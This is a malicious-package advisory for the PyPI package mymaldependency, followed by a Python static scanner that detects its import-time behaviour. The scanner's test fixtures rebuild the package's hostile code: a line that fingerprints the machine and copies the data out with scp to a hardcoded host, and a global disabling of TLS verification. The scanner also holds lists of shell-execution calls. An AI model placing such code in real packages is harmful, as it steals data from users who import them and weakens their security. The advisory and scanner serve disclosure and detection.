{
  "id": "MAL-2026-3694",
  "summary": "Malicious code in mymaldependency (PyPI)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1)\nMyMalDependency_package/__init__.py executes on every import: it calls os.uname() and os.getcwd(), writes the results to ./trans.txt in the importing process's current working directory, then invokes os.system('scp trans.txt Dell@192.168.129.164:E:\\\\download') to ship the file to a hardcoded remote host. This is one-way exfiltration of machine fingerprint data from the installing host, combined with unconsented shell command execution at import time. setup.py additionally disables TLS certificate verification globally (ssl._create_default_https_context = ssl._create_unverified_context), weakening the installer's trust posture during install. Source comments ('#恶意的依赖项', Chinese for 'malicious dependency') and a startup print ('start mal dependency') explicitly declare malicious intent. Metadata is placeholder (author '1', UNKNOWN fields, description 'test to create package'). Regardless of whether the hardcoded private-range destination IP is currently reachable, the code pattern constitutes active attack behavior against anyone who imports the package.\n",
  "modified": "2026-05-13T20:22:40.161523Z",
  "published": "2026-05-12T07:43:18Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "sha256": "38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1",
        "import_time": "2026-05-13T20:10:54.545210822Z",
        "source": "amazon-inspector",
        "id": "IN-MAL-2026-002298",
        "versions": ["2.1.1"],
        "modified_time": "2026-05-12T19:03:07Z"
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://pypi.org/project/MyMalDependency/2.1.1/"}
  ],
  "affected": [
    {
      "package": {"name": "mymaldependency", "ecosystem": "PyPI", "purl": "pkg:pypi/mymaldependency"},
      "versions": ["2.1.1"],
      "database_specific": {
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/mymaldependency/MAL-2026-3694.json",
        "cwes": [
          {"cweId": "CWE-506", "name": "Embedded Malicious Code", "description": "The product contains code that appears to be malicious in nature."}
        ],
        "indicators": {
          "evidence_files": [
            {"tlsh": "f3e0c69120a81ba8410bf0ea8e0cc35a9812f45283b06020c700a4aece0a95da018b79", "sha256": "9a0b6296be73e06b09502381d5d21c2f6c47200e6223394c85a8efc8c2f15132", "path": "MyMalDependency_package/__init__.py"},
            {"tlsh": "96e0c6328801f120a0c2b4eb09713039fb959c3a1420f0c433c1034916d518a9a0b81e", "sha256": "839ec74ba3a23ad2966dfc00b5b13ab295dc8febf97cd1d578c369544eaa5bf5", "path": "setup.py"},
            {"tlsh": "6cd023c8b5739015d0b2465614d043e74dd0132878dd05d95840350417272c31b4e073", "sha256": "b075784fbf82fa60dce71ec1b095a4938d340343cab5ecb272c525f450d56d05", "path": "PKG-INFO"}
          ],
          "package_integrity": [
            {"hashes": {"blake2b_256": "75ad00854a6201068d1160b864a38ffaece8351a7732243a9bc4d1aaa4a688d8", "sha256": "45899cb57dafe5b8e002a871c9084bb4a4d086f96904f2010d175f4455eac8f6", "md5": "02bc3c535a8809858a1f8426302b94f8"}, "filename": "MyMalDependency-2.1.1.tar.gz"}
          ]
        }
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {"name": "Amazon Inspector", "contact": ["actran@amazon.com"], "type": "FINDER"}
  ]
}
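A static triage check for the behaviour this record describes, as an added example that is not code from the advisory, from Amazon Inspector or from the ossf/malicious-packages project. It parses a module with Python's `ast` module and flags the four indicators the record names: shell or subprocess calls reachable at import time, host-fingerprinting calls, hard-coded IPv4 literals, and assignment to `ssl._create_default_https_context`. The `SAMPLE_*` sources are constructed fixtures that reconstruct the described `__init__.py` and `setup.py` behaviour; they are not the package's actual files, and the function and constant names are this example's own.

```python
"""Static triage for the MAL-2026-3694 pattern (added example, not the package's or advisory's code).

Nothing here executes the scanned source: it is parsed, never imported.
"""
import ast
import ipaddress
import re
import tarfile
from dataclasses import dataclass

SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
               "subprocess.call", "subprocess.check_call", "subprocess.check_output"}
FINGERPRINT_CALLS = {"os.uname", "os.getcwd", "os.getlogin", "platform.uname",
                     "platform.node", "socket.gethostname", "getpass.getuser"}
TLS_OVERRIDE_TARGET = "ssl._create_default_https_context"
IPV4_RE = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")


@dataclass
class Finding:
    kind: str          # shell_exec | fingerprint | hardcoded_ip | tls_verify_disabled | unparseable
    lineno: int
    detail: str
    import_time: bool  # True when the statement runs on a bare `import` of the module


def _dotted(node):
    """Render an Attribute/Name chain such as os.system as 'os.system'; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _visit(node, import_time, out):
    # Function and lambda bodies run only when called; module and class bodies run on import.
    if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
        import_time = False
    if isinstance(node, ast.Call):
        name = _dotted(node.func)
        if name in SHELL_CALLS:
            out.append(Finding("shell_exec", node.lineno, name, import_time))
        elif name in FINGERPRINT_CALLS:
            out.append(Finding("fingerprint", node.lineno, name, import_time))
    elif isinstance(node, ast.Assign):
        if any(_dotted(t) == TLS_OVERRIDE_TARGET for t in node.targets):
            out.append(Finding("tls_verify_disabled", node.lineno, TLS_OVERRIDE_TARGET, import_time))
    elif isinstance(node, ast.Constant) and isinstance(node.value, str):
        for ip in IPV4_RE.findall(node.value):
            try:
                scope = "private" if ipaddress.ip_address(ip).is_private else "public"
            except ValueError:
                continue  # e.g. 999.1.2.3 matches the regex but is not an address
            out.append(Finding("hardcoded_ip", node.lineno, f"{ip} ({scope})", import_time))
    for child in ast.iter_child_nodes(node):
        _visit(child, import_time, out)


def scan_source(src, filename="<memory>"):
    """Return the Findings for one module's source text, in source order."""
    out = []
    _visit(ast.parse(src, filename), True, out)
    return out


def verdict(findings):
    """block: a shell runs or TLS verification is disabled on import; review: the same APIs
    appear but only inside function bodies; clean: nothing flagged."""
    if any(f.kind in ("shell_exec", "tls_verify_disabled") and f.import_time for f in findings):
        return "block"
    return "review" if findings else "clean"


def triage_sdist(tar_path):
    """Scan every .py member of a downloaded sdist tarball without extracting it to disk."""
    results = {}
    with tarfile.open(tar_path) as tar:
        for m in tar.getmembers():
            if m.isfile() and m.name.endswith(".py"):
                src = tar.extractfile(m).read().decode("utf-8", "replace")
                try:
                    results[m.name] = scan_source(src, m.name)
                except SyntaxError as exc:
                    results[m.name] = [Finding("unparseable", exc.lineno or 0, str(exc), True)]
    return results


# Constructed fixture reconstructing the __init__.py behaviour the advisory describes.
SAMPLE_INIT = r'''
# constructed fixture, not the package's real file
import os
print("start mal dependency")
info = str(os.uname()) + "\n" + os.getcwd()
with open("./trans.txt", "w") as fh:
    fh.write(info)
os.system("scp trans.txt Dell@192.168.129.164:E:\\download")
'''

# Constructed fixture for the setup.py TLS override the advisory describes.
SAMPLE_SETUP = r'''
# constructed fixture, not the package's real file
import ssl
from setuptools import setup
ssl._create_default_https_context = ssl._create_unverified_context
setup(name="MyMalDependency", version="2.1.1", description="test to create package")
'''

# Constructed fixture: the same API used legitimately, and only when a function is called.
SAMPLE_BENIGN = r'''
import subprocess

def git_head():
    return subprocess.check_output(["git", "rev-parse", "HEAD"]).decode().strip()
'''

if __name__ == "__main__":
    for label, src in (("init", SAMPLE_INIT), ("setup", SAMPLE_SETUP), ("benign", SAMPLE_BENIGN)):
        findings = scan_source(src, label)
        print(label, verdict(findings), [(f.kind, f.lineno, f.detail) for f in findings])
```

Run `triage_sdist` on a tarball fetched with `pip download --no-deps --no-binary :all:` into a quarantine directory, after first comparing its SHA-256 with the `package_integrity` hash in the record above; the scanner never imports or executes the package, so it is safe to point at a known-bad artifact. Name matching is deliberately simple: a sample that builds `"sys" + "tem"` and calls `getattr(os, ...)`, or decodes its command from base64, will slip past it, so treat a `clean` verdict as "no obvious import-time execution", not as a clearance, and keep the file hashes in the advisory as the authoritative indicator.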